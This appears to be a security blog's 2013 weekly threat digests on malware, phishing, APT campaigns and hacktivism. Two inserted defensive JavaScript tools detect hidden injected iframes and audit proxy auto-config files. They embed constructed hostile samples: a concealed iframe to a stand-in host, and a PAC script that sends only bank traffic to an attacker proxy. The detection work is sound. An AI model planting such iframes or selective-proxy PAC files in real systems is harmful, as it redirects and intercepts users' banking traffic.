Wednesday, March 20, 2013

Weekly Threat Trends March 11-18 2013

Vulnerabilities, Tools, and Tactics

Android app developer licenses are being sold on the malware black market for $100 each, providing buyers “unfettered access to the official Google Play app store.” At least one purchase, attributed to a banking Trojan author, has been leaked.

Malware authors are using a fictitious business, legally registered in Brazil, to obtain application code-signing certificates, which they then use to sign malware and evade detection.

According to a report by Websense, 85% of websites used in attacks during 2012 were “legitimate sites.”

Related: Israeli website for the International Institute for Counter-Terrorism used in a watering-hole attack to deliver malware.

Seagate blog website used to serve malware

Fake Bank of America Online Digital Certificate themed emails used in phishing attack.

Travnet Trojan implicated in APT campaign

Blackhole, Sweet Orange, and Cool exploit kits named top weapons for cyber crooks

ArchiveLock Trojan used in targeted attacks in France and Spain to encrypt users’ files, demanding a $5,000 ransom

Adversary Activity & Campaigns

Decoy ICS/SCADA Water Utility Networks hit by attacks

Warning of vulnerabilities among California energy providers

US Department of State and Pentagon’s Army National Guard websites hacked through SQL injection and cross-site scripting (XSS) attacks by the Tunisian Cyber Army with assistance from the Al Qaida Electronic Army. The purpose appears to be gathering information for the upcoming OpBlackSummer, which the attackers claim is being coordinated with Chinese hackers.

APT1 Watch: Reserve Bank of Australia (RBA) documents acknowledge victim status in at least two breaches in 2011 with close connections to APT1.

ADP Package Delivery Notification phishing attack directs victims to Blackhole Exploit Kit websites

Cyber attack heads-up: campaign announced to “wipe Israel from the Internet” on April 7, 2013.

Bank watch: JP Morgan Chase website taken down through denial-of-service

US NIST National Vulnerability Database hacked and taken offline for days

Continued reports of hacktivism

42 Russian websites hacked by SiR Abdou

Celebrity financial information and social security numbers leaked following hack of free credit report provider

OpBlackSummer: US Government sites hacked - possible preparation for a larger event

Toshiba Turkey Website defaced by reMin hacker

Anonymous takes down political party website in Italy

Indian Hacker “Godzilla” infiltrates Pakistan government websites and leaks information

Service Center Website of Acer Thailand defaced by Turkish hacker

Anonymous attacks Philippines President and related government websites

Polish Sergianist hackers destroy popular Traditionalist website

Syrian Cyber Eagles defaces Saudi General Authority for Tourism and Antiquities website

Anonymous defaces Philippines National Telecommunications Commission website

152 Spanish websites hacked in protest against the deaths of 7 Moroccan immigrants

Defense and Response News

Pentagon creating new teams to launch cyberattacks

UK develops global cyber security capacity, supported by the ICSPA

HBGary releases virtual classroom for incident response professionals

Cyber-attacks eclipse terrorism in impact according to US leaders

Friday, March 15, 2013

Weekly Threat Trends March 3-11 2013

Vulnerabilities, Tools, and Tactics

Rogue Apache modules appear to be the source of a surge in iframe injection attacks on legitimate websites, which are used to drive visitors to the Blackhole exploit kit. How the rogue modules are being installed on the compromised servers is still unknown.
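The injected iframes in this kind of campaign are typically concealed (hidden via CSS, positioned off-screen, or sized 1x1) and point at a third-party host. The following is an added example, not code from the original report or from any vendor cited on the page: a small response-body check that flags iframes showing those traits. The HTML sample, the host names and the thresholds are constructed for illustration.

```javascript
// Added example: flag concealed iframes in an HTML response body, the pattern
// seen in server-side iframe injection. SAMPLE_HTML is constructed test data;
// the hosts in it are reserved/illustrative names, not real campaign domains.
const SAMPLE_HTML = `<html><body>
<h1>Welcome</h1>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<iframe src="http://example-bad.invalid/x.php" style="visibility:hidden;position:absolute;left:-1000px" width="1" height="1"></iframe>
</body></html>`;

const IFRAME_RE = /<iframe\b([^>]*)>/gi;
// name="double" | name='single' | name=bare
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*("([^"]*)"|'([^']*)'|([^\s"'>]+))/g;

// Parse the attribute text of a single tag into a lowercase-keyed object.
function parseAttrs(attrText) {
  const attrs = {};
  let m;
  while ((m = ATTR_RE.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[3] ?? m[4] ?? m[5] ?? '';
  }
  return attrs;
}

// Hostname of an absolute URL, or null for relative/unparseable src values.
function hostOf(src) {
  try { return new URL(src).hostname.toLowerCase(); } catch { return null; }
}

function sameSite(host, pageHost) {
  return host === pageHost || host.endsWith('.' + pageHost);
}

// Return one finding per iframe that is concealed from the user. pageHost is the
// site being inspected, so third-party sources can be called out separately.
function suspiciousIframes(html, pageHost) {
  const findings = [];
  let m;
  IFRAME_RE.lastIndex = 0;
  while ((m = IFRAME_RE.exec(html)) !== null) {
    const attrs = parseAttrs(m[1]);
    const src = attrs.src || '';
    const host = hostOf(src);
    const style = (attrs.style || '').toLowerCase();
    const w = parseInt(attrs.width, 10);
    const h = parseInt(attrs.height, 10);

    const reasons = [];
    if (/visibility\s*:\s*hidden|display\s*:\s*none/.test(style)) reasons.push('hidden via CSS');
    if (/(left|top)\s*:\s*-\d+/.test(style)) reasons.push('positioned off-screen');
    if ((!isNaN(w) && w <= 1) || (!isNaN(h) && h <= 1)) reasons.push('1x1 or zero-size');
    if (reasons.length === 0) continue; // a visible embed (video player etc.) is not flagged

    findings.push({
      src,
      host,
      thirdParty: host !== null && !sameSite(host, pageHost),
      reasons,
    });
  }
  return findings;
}

// Stand-alone run: expect exactly the hidden example-bad.invalid frame to be reported.
console.log(JSON.stringify(suspiciousIframes(SAMPLE_HTML, 'example.com'), null, 2));
```

Run it against the HTML your own server actually returns (fetched from outside the network, since a rogue module can serve clean content to local requests), and compare with the page source on disk; a frame present in the response but absent from the file on disk is the strongest indicator the module, not the site, is adding it.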

Malicious Java applet uses a certificate stolen from Clearesult Consulting to exploit trust and install automatically.

A report released by Cenzic claims 99% of web applications remain vulnerable to attack, calling for increased emphasis on mitigation.

Free malicious Java applet generating tool discovered in the wild. The tool can clone a legitimate website, create a malicious Java applet, then redirect victims to a site of the attacker’s choice.

Web browser proxy auto-configuration (PAC) tactic used in recent banking campaigns in Brazil to capture and redirect traffic to selected sites; the tactic is expected to spread globally.
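What makes a malicious PAC file effective is that it returns DIRECT for almost everything and a PROXY only for the handful of bank hosts the attacker wants to intercept, so the victim notices nothing on ordinary browsing. The following is an added example, not code from the original report or from any vendor on the page: a PAC auditor that evaluates FindProxyForURL against a set of probe URLs and reports selective proxying of financial hosts. The PAC text, the probe URLs, the proxy address and the list of financial domains are all constructed for illustration.

```javascript
// Added example: audit a PAC script for the "proxy only the bank" tactic.
// SAMPLE_PAC is constructed to mimic the behaviour described in the report;
// the hostnames use reserved .test/.example names and the proxy address is
// from the TEST-NET-3 documentation range.
const SAMPLE_PAC = `
function FindProxyForURL(url, host) {
  if (shExpMatch(host, "*.examplebank.test") || dnsDomainIs(host, "pagos.example.test"))
    return "PROXY 203.0.113.10:8080";
  return "DIRECT";
}`;

// Constructed probe set: two "financial" hosts and two unrelated ones.
const PROBES = [
  'https://www.examplebank.test/login',
  'https://pagos.example.test/',
  'https://www.example.com/',
  'https://mail.example.org/',
];
const FINANCIAL_SUFFIXES = ['examplebank.test', 'pagos.example.test'];

// Minimal versions of the helper functions a browser exposes to PAC code.
const pacHelpers = {
  shExpMatch: (s, pat) => {
    const re = pat.replace(/[.+^${}()|[\]\\]/g, '\\$&').replace(/\*/g, '.*').replace(/\?/g, '.');
    return new RegExp('^' + re + '$').test(s);
  },
  dnsDomainIs: (host, domain) => host.endsWith(domain),
  isPlainHostName: host => !host.includes('.'),
  myIpAddress: () => '127.0.0.1',
};

// Load the PAC source and return its FindProxyForURL bound to the stub helpers.
// This executes the PAC text; for untrusted samples run it in an isolated
// process or vm context rather than the auditor's own one.
function loadPac(pacSource) {
  const names = Object.keys(pacHelpers);
  const factory = new Function(
    ...names,
    pacSource + '\nreturn typeof FindProxyForURL === "function" ? FindProxyForURL : null;'
  );
  const fn = factory(...names.map(n => pacHelpers[n]));
  if (!fn) throw new Error('PAC does not define FindProxyForURL');
  return fn;
}

// Evaluate every probe and decide whether proxying is selective and aimed at
// financial hosts. A PAC that proxies everything (a normal corporate setup) or
// nothing is reported as "ok"; one that singles out bank hosts is "suspicious".
function auditPac(pacSource, probes, financialSuffixes) {
  const findProxy = loadPac(pacSource);
  const results = probes.map(url => {
    const host = new URL(url).hostname.toLowerCase();
    const decision = String(findProxy(url, host));
    return { url, host, decision, proxied: !/^\s*DIRECT\s*$/i.test(decision) };
  });
  const proxied = results.filter(r => r.proxied);
  const selective = proxied.length > 0 && proxied.length < results.length;
  const financialProxied = proxied.filter(r =>
    financialSuffixes.some(s => r.host === s || r.host.endsWith('.' + s)));
  return {
    results,
    selective,
    proxiedHosts: proxied.map(r => r.host),
    verdict: selective && financialProxied.length > 0 ? 'suspicious' : 'ok',
  };
}

// Stand-alone run: the constructed PAC should come back "suspicious".
console.log(JSON.stringify(auditPac(SAMPLE_PAC, PROBES, FINANCIAL_SUFFIXES), null, 2));
```

In practice the probe list would be the bank and payment domains your users actually visit, and the PAC source would come from the browser or WinHTTP proxy setting on a suspect machine; a PAC URL you did not deploy, or a PROXY decision for only those hosts, is the finding.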

Example of Android mobile malware commoditization found in an ad for the tool “perkele lite,” used to intercept and forward SMS messages.

Adversary Activity & Campaigns

Bank DDoS attacks resume: Izz ad-Din al-Qassam, believed to be directly supported by the Iranian government, announced and began executing a new phase of attacks targeting US banks.

Emerging phishing campaigns exploiting payroll and banking trust, using ADP TotalSource Payroll Invoice and Bank of America themed lures.

Targeted attack against Australia’s central bank, the Reserve Bank of Australia (RBA), succeeded in compromising at least one system. The attackers sought information that included details of Group of 20 (G20) negotiations. China is implicated.

Kaspersky discovers AlbaBotnet being used to target Chilean banks in an emerging campaign.

APT-1: Industry reporting attributes past campaigns to APT-1, including US, Japanese, and Indian victims, thanks to indicators from Mandiant’s report.

Surge in reports of hacktivism

Czech central bank, stock exchange, and banks hacked

Time Warner Cable website defaced

Gulf Oil Company (Agoco) defaced by QuisterTow

Aramco Twitter account hacked

Israeli sites hacked and defaced

180 Egyptian sites hacked by P@khTuN

Defense and Response News

China, in response to Mandiant and related APT-1 claims, begins a response campaign claiming it is the victim of repeated US-sourced intrusions and calls for new international agreements on cyber.

Deutsche Telekom unveils real-time map of global cyber-attacks detected on its global infrastructure.

Microsoft launches new Cybercrime Center to combat piracy and malware.

New cyber security and forensics center formed by UMASS to advance research on cyber security and forensics theory.

Prolexic successfully defends against large-scale DDoS against a utility.

Monday, March 4, 2013

Weekly Open Source Threat Report - 2/26/2013 - 3/3/2013

Vulnerabilities, Tools, and Tactics

MiniDuke malware, discovered by Kaspersky and CrySyS, has infected government computers in numerous nations. The malware was delivered through PDFs containing exploits for Adobe Reader versions 9, 10, and 11. Researchers have not yet revealed the nature or mission of the malware.

Multiple Java 0-days disclosed last week, with ties to the Bit9 hack from the previous week. Articles from FireEye refer to the associated malware as McRAT.

Adversary Activity & Campaigns

Chinese attackers from Mandiant’s APT1 targeted 23 US energy infrastructure companies during a 2011-2012 campaign, exfiltrating data which would allow them to access and control oil and natural gas industrial-control systems.

Anonymous gained access to and published email communications between a contractor and Bank of America security staff, exposing a monitoring program intended to keep tabs on the hacktivist group. The “hack” was not a breach of BofA systems: Anonymous reported that the server they obtained the emails from was open to external access and controlled by the contractor.

Evernote hacked, data on 50 million users exposed, including usernames, email addresses, and hashed passwords. Change your password now!

Crescent Healthcare confirms breach of patient records and social security numbers. The breach occurred on December 28, 2012; however, Crescent will not release information on how it happened.

Sabah land dispute conflict transitions from physical to cyber as forces from Malaysia and the Philippines target each other’s government websites.

Team Cymru uncovers a state-controlled cyber campaign leaking 1 Terabyte of data every day from US based systems to foreign countries. Report is currently private, details to follow.

Defense and Response News

Offensive security group CrowdStrike takes over and shuts down the Kelihos botnet, with 110,000 infected nodes. CrowdStrike redirected the command-and-control channels used by infected systems to a sinkhole it controlled, notified the victims, and shut down the botnet in an offensive campaign.

Increased calls from public for improved collaboration between government, private, and public cyber security organizations to defend against adversaries like Mandiant’s APT1.

IDF defines cyber warfare as the 5th realm of warfare and establishes a Cyber Command, bridging forces from the Intelligence and Teleprocessing branches.

Australia joins the Council of Europe Convention on Cybercrime following the passage of the Cybercrime Legislation Amendment Bill 2011. Among other powers, the legislation requires ISPs to retain data on persons deemed under suspicion by law enforcement.